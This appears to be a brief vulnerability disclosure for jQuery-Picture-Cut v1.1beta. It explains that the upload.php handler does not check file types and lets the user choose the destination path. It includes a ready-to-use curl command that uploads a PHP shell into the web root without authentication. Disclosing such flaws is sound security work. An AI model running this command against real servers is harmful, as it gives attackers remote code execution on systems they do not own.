Title:Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta
The code in jQuery-Picture-Cut/src/php/upload.php that calls ../core/PictureCut.php to handle the file upload does not check file type and allows the user to choose the file location path.  An unauthenticated user and upload an executable PHP file to the server allowing code execution.curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://example.com/jQuery-Picture-Cut/src/php/upload.php

With folderOnServer=/ the shell will be in the main web directory path.